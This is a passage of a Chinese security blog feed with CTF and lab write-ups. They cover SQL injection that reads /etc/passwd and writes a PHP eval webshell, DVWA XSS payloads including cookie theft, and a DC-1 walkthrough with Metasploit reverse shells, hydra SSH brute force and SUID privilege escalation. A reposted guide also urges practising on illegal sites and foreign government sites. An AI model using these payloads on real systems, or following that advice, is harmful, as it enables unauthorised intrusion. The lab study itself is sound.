load_file(‘/etc/passwd’),2%23<br>root:x:0:0:root:/root:/bin/ash<br>bin:x:1:1:bin:/bin:/sbin/nologin<br>daemon:x:2:2:daemon:/sbin:/sbin/nologin<br>adm:x:3:4:adm:/var/adm:/sbin/nologin<br>lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br>sync:x:5:0:sync:/sbin:/bin/sync<br>shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br>halt:x:7:0:halt:/sbin:/sbin/halt<br>mail:x:8:12:mail:/var/mail:/sbin/nologin<br>news:x:9:13:news:/usr/lib/news:/sbin/nologin<br>uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin<br>operator:x:11:0:operator:/root:/sbin/nologin<br>man:x:13:15:man:/usr/man:/sbin/nologin<br>postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin<br>cron:x:16:16:cron:/var/spool/cron:/sbin/nologin<br>ftp:x:21:21::/var/lib/ftp:/sbin/nologin<br>sshd:x:22:22:sshd:/dev/null:/sbin/nologin<br>at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin<br>squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin<br>xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin<br>games:x:35:35:games:/usr/games:/sbin/nologin<br>cyrus:x:85:12::/usr/cyrus:/sbin/nologin<br>vpopmail:x:89:89::/var/vpopmail:/sbin/nologin<br>ntp:x:123:123:NTP:/var/empty:/sbin/nologin<br>smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin<br>guest:x:405:100:guest:/dev/null:/sbin/nologin<br>nobody:x:65534:65534:nobody:/:/sbin/nologin<br>www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin<br>mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin<br>nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin</p></blockquote><h2 id="读取nginx配置文件,寻找网站根目录"><a href="#读取nginx配置文件,寻找网站根目录" class="headerlink" title="读取nginx配置文件,寻找网站根目录"></a>读取nginx配置文件,寻找网站根目录</h2><blockquote><p>?id=-1)))))) union select load_file(‘/etc/nginx/nginx.conf’),2%23<br>Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ .php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } } [password] => 2 ) )</p></blockquote><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">Array</span><br>(<br> [<span class="hljs-number">0</span>] => <span class="hljs-title function_ invoke__">Array</span><br> (<br> [username] => daemon off;<br><br>worker_processes auto;<br><br>error_log /<span class="hljs-keyword">var</span>/log/nginx/error.log warn;<br><br>events {<br> worker_connections <span class="hljs-number">1024</span>;<br>}<br><br>http {<br> <span class="hljs-keyword">include</span> /etc/nginx/mime.types;<br> default_type application/octet-stream;<br> sendfile on;<br> keepalive_timeout <span class="hljs-number">65</span>;<br><br> server {<br> listen <span class="hljs-number">80</span>;<br> server_name localhost;<br> root /<span class="hljs-keyword">var</span>/www/html;<br> index index.php;<br><br> proxy_set_header Host <span class="hljs-variable">$host</span>;<br> proxy_set_header X-Real-IP <span class="hljs-variable">$remote_addr</span>;<br> proxy_set_header X-Forwarded-For <span class="hljs-variable">$proxy_add_x_forwarded_for</span>;<br><br> location / {<br> try_files <span class="hljs-variable">$uri</span> <span class="hljs-variable">$uri</span>/ /index.php?<span class="hljs-variable">$args</span>;<br> }<br><br> location ~ \.php$ {<br> try_files <span class="hljs-variable">$uri</span> =<span class="hljs-number">404</span>;<br> fastcgi_pass <span class="hljs-number">127.0</span>.<span class="hljs-number">0.1</span>:<span class="hljs-number">9000</span>;<br> fastcgi_index index.php;<br> <span class="hljs-keyword">include</span> fastcgi_params;<br> fastcgi_param SCRIPT_FILENAME <span class="hljs-variable">$document</span>_root<span class="hljs-variable">$fastcgi_script_name</span>;<br> }<br><br> }<br>}<br> [password] => <span class="hljs-number">2</span><br> )<br><br>)<br></code></pre></td></tr></table></figure><h2 id="写入php探针"><a href="#写入php探针" class="headerlink" title="写入php探针:"></a>写入php探针:</h2><blockquote><p>?id=-1)))))) union select ‘<?php phpinfo();?>‘,2 into outfile ‘/var/www/html/info.php’%23<br><a href="http://node6.anna.nssctf.cn:28413/info.php">http://node6.anna.nssctf.cn:28413/info.php</a></p></blockquote><h2 id="写入webshell"><a href="#写入webshell" class="headerlink" title="写入webshell"></a>写入webshell</h2><blockquote><p>?id=-1)))))) union select ‘<?php eval($_POST["cc"]);?>‘,2 into outfile ‘/var/www/html/cc.php’%23<br>蚁剑连接:<a href="http://node6.anna.nssctf.cn:28413/cc.php">http://node6.anna.nssctf.cn:28413/cc.php</a> 密码cc</p></blockquote>]]></content>
<categories>
<category>SQL</category>
</categories>
<tags>
<tag>sql</tag>
</tags>
</entry>
<entry>
<title>dvwa全解</title>
<link href="/2024/11/23/dvwa%E5%85%A8%E8%A7%A3/"/>
<url>/2024/11/23/dvwa%E5%85%A8%E8%A7%A3/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>说到靶机,那么经典的dvwa靶机肯定不能错过,它是一款非常适合新手入门的靶机,它集成了多种漏洞,并且可以自由选择难度,非常适合新手入门,想玩的话自己搭建就好,我这是在服务器上搭的,用来玩玩</p><h2 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h2><h3 id="Brute-Force"><a href="#Brute-Force" class="headerlink" title="Brute Force"></a>Brute Force</h3><p>随便输入后便是这个返回值,说明密码错误<br><img src="https://gitee.com/fogpost/photo/raw/master/202411231240412.png" srcset="/img/loading.gif" lazyload><br>我们用抓包软件抓包,然后发送到repeat,yakit的爆破采用的是文件标签,原理是和bp一样的对字典有要求,利用响应的大小来判断正误<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261753518.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261806101.png" srcset="/img/loading.gif" lazyload></p><h3 id="command-injection"><a href="#command-injection" class="headerlink" title="command injection"></a>command injection</h3><p>直接在ip查询后面加入的命令执行,可怕可怕,cat也可以执行<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261810028.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261811659.png" srcset="/img/loading.gif" lazyload></p><h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p>抓取原来修改密码的报文后在yakit中修改略微,重放便可以修改密码,也可以将网址修改一部分再重放,同样修改成功<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261817959.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261818130.png" srcset="/img/loading.gif" lazyload><br>这个过程有个技巧就是长链变短链,利用站长工具即可实现,防止社工时让受击者发现<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261824846.png" srcset="/img/loading.gif" lazyload><br>还可以页面构造</p><h3 id="XSS-DOM"><a href="#XSS-DOM" class="headerlink" title="XSS(DOM)"></a>XSS(DOM)</h3><p>查看页面源码,没有php代码,仅有js代码,我们可以利用js脚本<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261914977.png" srcset="/img/loading.gif" lazyload><br>点击英文发现,存在一个明文网址,我们可以利用这个English来做个文章</p><blockquote><p><a href="http://110.41.22.24/vulnerabilities/xss_d/?default=English">http://110.41.22.24/vulnerabilities/xss_d/?default=English</a></p></blockquote><blockquote><p><a href="http://110.41.22.24/vulnerabilities/xss_d/?default=%5C">http://110.41.22.24/vulnerabilities/xss_d/?default=\</a><script>alert('xss')</script></p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411261906137.png" srcset="/img/loading.gif" lazyload></p><h3 id="XSS-Reflected"><a href="#XSS-Reflected" class="headerlink" title="XSS(Reflected)"></a>XSS(Reflected)</h3><p>反射式XSS,查看源码,同上只不过这次是在输入框中进行反射<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261914096.png" srcset="/img/loading.gif" lazyload></p><blockquote><p><script>alert('xss')</script></p></blockquote><p>拿cookie</p><blockquote><p><script>alert(document.cookie)</script><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261911735.png" srcset="/img/loading.gif" lazyload></p></blockquote>]]></content>
<categories>
<category>渗透测试</category>
</categories>
<tags>
<tag>dvwa</tag>
</tags>
</entry>
<entry>
<title>vulhub搭建</title>
<link href="/2024/11/21/vulhub%E6%90%AD%E5%BB%BA/"/>
<url>/2024/11/21/vulhub%E6%90%AD%E5%BB%BA/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>涉及一些经典的漏洞和靶场环境,如果有现成的可以下载固然很好,但是当需要我们自己复现和搭建环境时便会出现许多的bug,这时便需要一个较好的工具来实现便捷的靶场环境构建,这个工具便是vulhub,它是一个基于docker的漏洞环境集合,方便我们快速搭建漏洞环境,作者是p牛也是人尽皆知的离别歌,可以去看看人家的博客网</p><h1 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h1><p>vulhub是个基于docker的工具平台,自行下载docker和docker-compose</p><h2 id="下载Vulhub"><a href="#下载Vulhub" class="headerlink" title="下载Vulhub"></a>下载Vulhub</h2><p>任意创建一个文件夹,从github获取对应的靶场环境,然后进入vulhub目录</p><blockquote><p>git clone <a href="https://github.com/vulhub/vulhub.git">https://github.com/vulhub/vulhub.git</a><br>cd vulhub</p></blockquote><p>随便进入一个目录,比如shiro,ls+cd进入想要的cve文件中启动docker-compose<br>即可创建靶场,注意内存资源的分配,以及部分漏洞各个工具的版本问题<br><img src="https://gitee.com/fogpost/photo/raw/master/202411211945375.png" srcset="/img/loading.gif" lazyload></p><p>搭建还是挺简单的</p>]]></content>
<categories>
<category>工具</category>
</categories>
<tags>
<tag>tool</tag>
</tags>
</entry>
<entry>
<title>服务器更新计划和流程</title>
<link href="/2024/11/20/%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%9B%B4%E6%96%B0%E8%AE%A1%E5%88%92%E5%92%8C%E6%B5%81%E7%A8%8B/"/>
<url>/2024/11/20/%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%9B%B4%E6%96%B0%E8%AE%A1%E5%88%92%E5%92%8C%E6%B5%81%E7%A8%8B/</url>
<content type="html"><![CDATA[]]></content>
</entry>
<entry>
<title>DC-提权靶机</title>
<link href="/2024/11/19/DC-%E6%8F%90%E6%9D%83%E9%9D%B6%E6%9C%BA/"/>
<url>/2024/11/19/DC-%E6%8F%90%E6%9D%83%E9%9D%B6%E6%9C%BA/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>学习web怎么可以少了对靶机的攻击呢,渗透方向的学习必须要有靶机攻击的基础,前几天看到一篇文章发现DC系列正好可以来训练自己的水平和对工具的理解和使用</p><h1 id="平台"><a href="#平台" class="headerlink" title="平台"></a>平台</h1><p>攻击机 kali2024.3<br>靶机 DC系列</p><h1 id="具体攻击"><a href="#具体攻击" class="headerlink" title="具体攻击"></a>具体攻击</h1><h2 id="DC-1"><a href="#DC-1" class="headerlink" title="DC-1"></a>DC-1</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><h4 id="目标机ip"><a href="#目标机ip" class="headerlink" title="目标机ip"></a>目标机ip</h4><p>在利用ifconfig了解知道自己的ip为192.168.56.135后利用nmap扫描同网段存活主机</p><blockquote><p>nmap -sP 192.168.56.135/24<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191207141.png" srcset="/img/loading.gif" lazyload></p></blockquote><p>也可以利用arp-scan:</p><blockquote><p>arp-scan -l<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191209537.png" srcset="/img/loading.gif" lazyload></p></blockquote><p>获取到目标机ip为192.168.56.146</p><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><blockquote><p>nmap -A 192.168.56.146,详细扫描了对应的服务和版本<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191211378.png" srcset="/img/loading.gif" lazyload></p></blockquote><h4 id="目标访问"><a href="#目标访问" class="headerlink" title="目标访问"></a>目标访问</h4><p>我们发现存在80端口,利用web访问这个ip地址发现登录页面<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191214818.png" srcset="/img/loading.gif" lazyload><br>利用目录扫描工具,查看这个ip的目录文件</p><h3 id="指纹识别"><a href="#指纹识别" class="headerlink" title="指纹识别"></a>指纹识别</h3><p>利用whatweb工具识别web服务器的指纹,在火狐上面有个好用的工具叫做wapper,也可以查看对应的cms服务,不过可能需要网速比较快才好</p><blockquote><p>whatweb -v 192.168.56.146,扫描到主要的系统版本,服务号和php版本<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191219907.png" srcset="/img/loading.gif" lazyload><br>wapper:<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191218063.png" srcset="/img/loading.gif" lazyload><br>发现CMS为Drupal,版本为7</p></blockquote><h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>发现cms便可以尝试一下msf来使用现成的攻击模块了</p><h4 id="msfconsole获取session"><a href="#msfconsole获取session" class="headerlink" title="msfconsole获取session"></a>msfconsole获取session</h4><blockquote><p>msfconsole ,利用search命令搜索cms的漏洞<br>search Drupal<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191223407.png" srcset="/img/loading.gif" lazyload><br>发现序号为1的可以使用,我们完成设定好攻击模块的各个参数<br>use 1<br>show payloads<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191225109.png" srcset="/img/loading.gif" lazyload><br>我们发现,这些payload和前面出现的tcp端口可能有关系所以选择payload为php/meterpreter/reverse_tcp<br>set payload php/meterpreter/reverse_tcp<br>show options<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191227042.png" srcset="/img/loading.gif" lazyload><br>yes为必填大部分已经完成我们设计好攻击机ip,RHOSTS即可<br>set rhosts 192.168.56.146<br>exploit<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191229430.png" srcset="/img/loading.gif" lazyload><br>执行完成获取session </p></blockquote><h4 id="获取shell登录sql"><a href="#获取shell登录sql" class="headerlink" title="获取shell登录sql"></a>获取shell登录sql</h4><blockquote><p>获取DC-1的信息和shell,运用python反弹,获取更好的交互<br>sysinfo shell<br>python -c “import pty;pty.spawn(‘/bin/bash’)”<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191233860.png" srcset="/img/loading.gif" lazyload><br>ls+cat查看flag1<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191235094.png" srcset="/img/loading.gif" lazyload><br>利用find . -name “set*”查找set文件<br>发现settings文件,查看文件,发现flag和数据库信息<br><img src="https://gitee.com/fogpost/photo/raw/master/202411191237652.png" srcset="/img/loading.gif" lazyload><br>使用数据库账户和密码来登录数据库<br>mysql -udbuser -pR0ck3t<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201642780.png" srcset="/img/loading.gif" lazyload><br>show databases;查看数据库<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201642468.png" srcset="/img/loading.gif" lazyload><br>use drupaldb; show tables;查看表,发现users表<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201644727.png" srcset="/img/loading.gif" lazyload><br>看表select * from users;看表结构desc users;<br>发现name和pass列<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201646673.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411201647915.png" srcset="/img/loading.gif" lazyload></p></blockquote><h4 id="覆盖admin密码登录"><a href="#覆盖admin密码登录" class="headerlink" title="覆盖admin密码登录"></a>覆盖admin密码登录</h4><blockquote><p>查看加密方式,搜索文件, find . -name “password*”<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201651432.png" srcset="/img/loading.gif" lazyload><br>查看password-hash.sh,发现为php加密文件,了解发现是使用 Drupal 的密码算法(基于 PBKDF2 和可配置的工作因子)生成一个加盐的安全哈希,没能力搞不懂我们用它来生成一个密码的哈希值,然后用这个哈希值去覆盖来登录<br>php ./scripts/password-hash.sh 123456<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201656246.png" srcset="/img/loading.gif" lazyload><br>hash: $S$Dyi0o5A9rq9O4imggBtz.INzLGWgqCjo67vC15JYgHjEVtkpdV/F<br>覆盖admin的密码<br>mysql>update users set pass=”$S$Dyi0o5A9rq9O4imggBtz.INzLGWgqCjo67vC15JYgHjEVtkpdV/F” where name=”admin”;<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201700729.png" srcset="/img/loading.gif" lazyload><br>成功登录,之后再dashborad中发现falg3<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201700614.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411201701862.png" srcset="/img/loading.gif" lazyload></p></blockquote><h4 id="获取flag4,爆破密码"><a href="#获取flag4,爆破密码" class="headerlink" title="获取flag4,爆破密码"></a>获取flag4,爆破密码</h4><blockquote><p>查看etc/passwd,发现falg4的账户,查询falg4的home目录<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201702238.png" srcset="/img/loading.gif" lazyload><br>,这次发现需要root目录,而且让我们爆破了<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201703822.png" srcset="/img/loading.gif" lazyload><br>我们也有可能无法访问/home/flag4/flag4.txt,可以用hydra工具来爆破flag4的密码,发现密码是,orange<br>hydra -l flag4 -P /usr/share/john/password.lst 192.168.56.146 ssh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201709083.png" srcset="/img/loading.gif" lazyload></p></blockquote><h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><h4 id="suid提权"><a href="#suid提权" class="headerlink" title="suid提权"></a>suid提权</h4><p>查找一个属于root的拥有s权限的文件</p><ul><li>SUID(Set User ID),SUID 可以让调用者以文件拥有者的身份运行该文件,所以我们利用 SUID 提权的思路就是运行 root 用户所拥有的 SUID 的文件,那么我们运行该文件的时候就得获得 root 用户的身份了。</li></ul><p>常见的可用于 SUID 提权的文件有:</p><blockquote><p>find、bash、nmap、vim、more、less、nano、cp<br>//当没有s权限时可以使用:chmod u+s 命令路径,增加权限</p></blockquote><p>查找哪些命令具备 SUID 标识</p><blockquote><p>find / -perm -4000 2>/dev/null<br>find / -perm -u=s -type f 2>/dev/null</p></blockquote><p>发现find文件<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201714007.png" srcset="/img/loading.gif" lazyload><br>使用find文件来提权:<br>利用 find 命令随便查找一个正确的文件(夹)路径,后面加上 -exec shell 命令 ;<br>提权 /bin/bash 或者 /bin/sh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201717565.png" srcset="/img/loading.gif" lazyload><br>最后完成flag获取<br><img src="https://gitee.com/fogpost/photo/raw/master/202411201719543.png" srcset="/img/loading.gif" lazyload></p><h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>DC-1虽然还是比较简单,但是流程也比较长在此做一个总结,DC-1靶机主要考察了信息收集、漏洞利用、权限提升、提权等基本知识。<br>数据库的操作,suid提权,hydra爆破ssh端口,这些都是我之前没有接触过的跟着流程走一边还是挺好的</p>]]></content>
<categories>
<category>省投测试</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>电子榨菜</title>
<link href="/2024/11/18/%E7%94%B5%E5%AD%90%E6%A6%A8%E8%8F%9C/"/>
<url>/2024/11/18/%E7%94%B5%E5%AD%90%E6%A6%A8%E8%8F%9C/</url>
<content type="html"><![CDATA[<h1 id="电子榨菜"><a href="#电子榨菜" class="headerlink" title="电子榨菜"></a>电子榨菜</h1><h2 id="2024-10-26-23-06-28"><a href="#2024-10-26-23-06-28" class="headerlink" title="2024-10-26 23:06:28"></a>2024-10-26 23:06:28</h2><p>写写干了什么,现在好想玩星际啊,不想写东西了,直接开完,这个geekcode还会接我话好玩的,星际推荐玩星际酒馆,不过在写这个东西的时候突然发现,一个功能,就是vscode的自动换行功能直接搜就行好用的,会根据现在的页面大小自动换行,星际战役好贵啊250,早十年玩就好了,还会送的,要不要写写明天干什么呢。,加个评论,看看这些好玩吧<br><img src="https://gitee.com/fogpost/photo/raw/master/202410262318542.png" srcset="/img/loading.gif" lazyload></p><h2 id="2024-10-29"><a href="#2024-10-29" class="headerlink" title="2024-10-29"></a>2024-10-29</h2><p>今天的网鼎杯也是坐上一次大牢了,八个小时满打满算直接看了5个小时的空挡,这个是安卓,也是坐上牢,我发现逆向领域简直就是一个乙游大世界,想要成熟稳重有我们的windows逆向,想要幽默风趣有我们的安卓逆向,想要老公姐有我们的硬件逆向,我们逆向领域真是吃得太好了,妈的刚刚发生了一件大事,狗吧微软把我的贴子吃掉了,php木马的篇帖子直接被删了没办法还原,看样子以后还是尽量用图片把,晚上陪337寝室出去嗨皮了一把,被ylq坑惨了,🐕吧带的什么破地方,吃不得,下次带我的好朋友hy去吃,明天开始看看逆向核心原理吧,沉淀得太少喽。<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292358898.jpg" srcset="/img/loading.gif" lazyload></p><h2 id="2024-11-7"><a href="#2024-11-7" class="headerlink" title="2024-11-7"></a>2024-11-7</h2><p>距离上次记录已经过了这么久了啊,也是过去一个多礼拜了,这个礼拜感觉有点摆烂了,早点离开寝室去搞复习,不然就要挂大科了,绝对不能挂科,不然会难受死去,我也是是给小登出上题了,但是感觉不太好现在就发过程出来,等比赛结束以后再从草稿箱里面拿出来吧,最近又看到一个新的ctf知识网站了,感觉挺不错的但是又有一个通病,逆向方面是真的不行,我在想要不要自己再搭一个reverse-wiki出来,好好强化一下这个领域的实力,不然真的逆向不如和pwn和在一起算了,虽然本来也差不多,但是过程逆向和漏洞利用的区别还是有的</p><h2 id="2024-11-10"><a href="#2024-11-10" class="headerlink" title="2024-11-10"></a>2024-11-10</h2><p>又过了两天了,该开始高区块链的复习了,嗯嗯还有网课注意一下,那些网课要去刷,最近又发现了好用的工具Microsofttodo,虽然少了些功能但是能用就行,ticktick还是有些麻烦,写算法我写写写,每次周末就是摆大烂,感觉这个recerse-wiki要留到寒假去搞了,但是寒假就要开始准备考研了,时间不多喽,看看寒假能不能开个好头<br><img src="https://gitee.com/fogpost/photo/raw/master/202411102003839.png" srcset="/img/loading.gif" lazyload></p><h2 id="2024-11-18"><a href="#2024-11-18" class="headerlink" title="2024-11-18"></a>2024-11-18</h2><p>娘西皮的,又这个点了,看样子要积极出去搞学习,寝室就是摆大烂,狗屎软件工程不会复习,昨天晚上又和室友讨论怎么活下去的问题,人生啊任重而道远,考研,考公,或是直接工作都是一种选择,我是想去考研究生的,也必然是要去做这件事的,但是事实合乎如此么,也确实是合乎如此<br><img src="https://gitee.com/fogpost/photo/raw/master/202411182346697.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>电子榨菜</category>
</categories>
<tags>
<tag>snake</tag>
</tags>
</entry>
<entry>
<title>web安全流程</title>
<link href="/2024/11/15/web%E5%AE%89%E5%85%A8%E6%B5%81%E7%A8%8B/"/>
<url>/2024/11/15/web%E5%AE%89%E5%85%A8%E6%B5%81%E7%A8%8B/</url>
<content type="html"><![CDATA[<p>作者:Ph0rse<br>链接:<a href="https://www.zhihu.com/question/267204109/answer/320502511">https://www.zhihu.com/question/267204109/answer/320502511</a><br>来源:知乎<br>著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。</p><p>一、前期一系列的练习平台,大部分都有题解,实在十几天弄不出来可以看看题解。<br>SQL注入:RedTiger’s Hackit<br>web:网络安全实验室|网络信息安全攻防学习平台<br>综合:[WeChall]<br>Challenges经典老平台:南京邮电大学网络攻防训练平台<br>综合性新平台:CTF - 练习平台<br>渗透:Penetration test lab<br>综合性黑客game:Game of Hacks<br>XCTF的训练平台:XCTF实训平台 | 登 录<br>I春秋的CTF复现平台:<a href="https://www.ichunqiu.com/racing/58837">https://www.ichunqiu.com/racing/58837</a><br>安恒的平台:登录 - 明御® 攻防实验室<br>一个综合的新平台,貌似里面二进制的题挺好:Jarvis OJ<br>一个高端平台,里面有一些硬件、云安全、内网渗透的题:Exploit Exercises<br>又一个高端平台,里面有一些Oracle、密码学之类的题目:Under the Wire<br>渗透练习平台:<a href="https://pentest.training/mockexams.php">https://pentest.training/mockexams.php</a><br>一个代码审计的平台(不是web方向,有很多都是C语言的审计,墙裂建议女装大佬来秒):Websec<br>一个封装好的CTF平台:Vulnerable Docker VM - NotSoSecure<br>也是封装好的一些训练环境:Vulnerable By Design ~ VulnHub<br>PHP安全训练平台:PHP Security Advent Calendar 2017<br>一个国外的CTFwiki,质量好像一般:Forgotten Security’s CTF Wiki<br>一个和Metasploit配套的靶场—Metasploitable: <a href="http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip">http://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip</a><br>CTF工具库: CTF资源库|CTF工具下载|CTF工具包|CTF工具集合<br>以上是我自己整理的内容,同时推荐其它大佬的资源整理贴<br>~个人总结-网络安全学习和CTF必不可少的一些网站 - ida0918的博客 - CSDN博客 </p><p>二、中期打一些有奖金的CTF比赛,一些优质的CTF比赛还是比较贴近实战的,比如17年的HCTFCTF时间表:<br>XCTF比赛的时间表:首页 - XCTF社区<br>大型比赛的时间表:All about CTF (Capture The Flag)<br>CTF指南:CTF Rank,你的CTF参赛指南<br>CTFwiki:墙裂推荐!CTF Wiki<br>2018年的CTF竞赛 2018·CTF·信息安全竞赛导航 </p><p>一些CTF大佬的博客:<br>Hackfun - | Secblog | Pentest | Auditing | Sectool | CTF Write-up<br>Go0s @ 老 锥<br>Swing’Blog 有恨无人省<br><a href="http://haojiawei.xyz/page/3/">http://haojiawei.xyz/page/3/</a><br>pcat - 博客园<br>Si1ence’s Blog - 雨一落,化开我眼中的冰,蔓延成河。<br>Medici.Yan’s Blog<br>Radiation’s blog<br><a href="http://l-team.org/">http://l-team.org/</a><br>Sebastian Neef - 0day.work<br><a href="https://www.jimwilbur.com/">https://www.jimwilbur.com/</a><br>M4x - 博客园<br>当然,也不要仅仅局限于CTF比赛,多用docker去复现一些CVE环境,自己玩玩儿,再跟着P神学一下代码审计,不要拿到别人网站源码还不知道怎么getshell~一些闭源的cms,很容易审出洞。</p><p>这里在推荐一下p神的一个项目,用docker-compose去一键复现漏洞环境。</p><p>vulhub/vulhub首页 | 离别歌vulhub/vulhub</p><p>三、后期那些刻意的环境已经满足不了你了,去实战吧<br>日常关注着漏洞预警:Exploits Database by Offensive Security<br>瞄准相关漏洞之后,用shodan去进行漏洞全球主机探测:Shodan Manual · GitBook<br>先知安全服务平台<br>漏洞银行(BUGBANK) 官方网站 | 全球领先的漏洞发现平台<br>补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC,库带计划 - 国内首个现金奖励漏洞平台<br>一些非法网站,比如黄网、赌博网站也可以用来练手,反正是它们也是违法的,但不要去谋取利益就好。<br>大陆政府的网站绝对不要碰。如果心痒痒就去搞国外zf的,因为他们的人也在搞咱们政府的练手。 </p><p>作者:Ph0rse<br>链接:<a href="https://www.zhihu.com/question/267204109/answer/320502511">https://www.zhihu.com/question/267204109/answer/320502511</a><br>来源:知乎<br>著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。</p>]]></content>
</entry>
<entry>
<title>owasp top10 十大常见漏洞</title>
<link href="/2024/11/15/web%E5%8D%81%E5%A4%A7%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/"/>
<url>/2024/11/15/web%E5%8D%81%E5%A4%A7%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/</url>
